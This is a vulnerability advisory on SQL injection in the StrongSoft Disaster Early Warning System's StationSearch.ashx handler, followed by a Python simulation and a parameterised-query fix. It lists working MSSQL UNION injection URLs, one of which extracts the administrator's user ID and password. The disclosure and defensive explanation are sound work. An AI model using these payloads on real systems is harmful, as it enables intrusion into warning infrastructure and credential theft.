StrongSoft Disaster Early Warning System: SQL injection in the stationName parameter of /Report/AjaxHandle/StationChoose/StationSearch.ashx

2016-01-26T00:00:00
ID SSV:90615
Type seebug
Reporter 哆啦A梦
Modified 2016-01-26T00:00:00

Description

Injection URL: /Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=1&stationType='KKK'&sqlWhere=

Injected parameter: stationName

The value of stationName is placed into the SQL statement without escaping. Each payload below opens with `')`, which indicates the value sits inside a quoted, parenthesised expression; it then neutralises the original condition with `and 1=2`, appends a two-column `union all select` so the injected row is returned in place of a station record, and comments out the remainder of the statement with `--`. The functions and object names used (`@@version`, `db_name()`, `top 1`, `strongmain.dbo.Web_SystemUser`) are Microsoft SQL Server syntax.

```
[Database version]
/Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=')+and+1=2++union+all+select+(@@version),NULL--&stationType='KKK'&sqlWhere=

[Current database]
/Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=')+and+1=2++union+all+select+(db_name()),NULL--&stationType='KKK'&sqlWhere=

[Administrator account and password]
/Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=')+and+1=2++union+all+select+(select+top+1+UserID%2b'|'%2bUserPwd+from+strongmain.dbo.Web_SystemUser),NULL--&stationType='KKK'&sqlWhere=
```

![](https://images.seebug.org/contribute/859f1888-a233-46de-b7b0-dc6f3e0ae050-屏幕快照 2016-01-15 下午11.32.05.png)

![](https://images.seebug.org/contribute/c9898cd0-91e7-4092-8f8b-30ea30b0269a-屏幕快照 2016-01-15 下午11.32.34.png)
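The mechanism behind these payloads, as an added example that is not part of the original advisory and is not StrongSoft's code: a Python script that simulates the handler against an in-memory SQLite database, with the raw-concatenation query next to a parameterised one. The query shape (two selected columns, stationName inside `LIKE '%...%')`, stationType interpolated without quotes) is inferred from the `')` prefix of the payloads and the quoted `'KKK'` value in the URL and is an assumption, not recovered source; the tables and rows are constructed; the payloads are rewritten in SQLite syntax (`||` and `LIMIT 1` instead of MSSQL's `+` and `TOP 1`, `sqlite_version()` instead of `@@version`).

```python
import sqlite3

# Advisory payloads rewritten for SQLite (assumption: the real backend is MSSQL,
# where the advisory uses @@version, TOP 1 and '+' string concatenation).
VERSION_PAYLOAD = "') and 1=2 union all select sqlite_version(),NULL--"
USER_PAYLOAD = ("') and 1=2 union all select "
                "(select UserID||'|'||UserPwd from Web_SystemUser limit 1),NULL--")


def make_db():
    """Constructed in-memory stand-in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Station (StationID TEXT, StationName TEXT, StationType TEXT)")
    conn.executemany("INSERT INTO Station VALUES (?, ?, ?)",
                     [("S001", "North Gauge", "RAIN"), ("S002", "South Gauge", "RIVER")])
    # Same table name as in the advisory's third payload; the row itself is a constructed sample.
    conn.execute("CREATE TABLE Web_SystemUser (UserID TEXT, UserPwd TEXT)")
    conn.execute("INSERT INTO Web_SystemUser VALUES ('admin', 's3cret')")
    conn.commit()
    return conn


def search_vulnerable(conn, station_name, station_type):
    """Assumed shape of the original handler: raw string concatenation.

    stationName lands inside LIKE '%...%'), which is why the payloads open with ')
    and select exactly two columns to line up with the outer SELECT. stationType is
    interpolated without quotes, which is why the advisory's URL supplies 'KKK'
    with its own quotes. The trailing -- discards whatever the handler appends.
    """
    sql = ("SELECT StationID, StationName FROM Station "
           "WHERE (StationName LIKE '%" + station_name + "%') "
           "AND StationType = " + station_type)
    return conn.execute(sql).fetchall()


def search_fixed(conn, station_name, station_type):
    """Same query with bound parameters: the input can only ever be a pattern or a value."""
    sql = ("SELECT StationID, StationName FROM Station "
           "WHERE (StationName LIKE '%' || ? || '%') AND StationType = ?")
    return conn.execute(sql, (station_name, station_type)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(search_vulnerable(db, "North", "'RAIN'"))        # normal use: [('S001', 'North Gauge')]
    print(search_vulnerable(db, VERSION_PAYLOAD, "'KKK'"))  # [('<sqlite version>', None)]
    print(search_vulnerable(db, USER_PAYLOAD, "'KKK'"))     # [('admin|s3cret', None)]
    print(search_fixed(db, USER_PAYLOAD, "KKK"))            # []
```

With concatenation, the injected row replaces a station record because the attacker controls the number and content of the selected columns; with bound parameters the whole payload is just a LIKE pattern that matches no station, and the normal search (`search_fixed(db, "North", "RAIN")`) still returns the expected row. The same fix applies to stationType and sqlWhere if they are concatenated the same way.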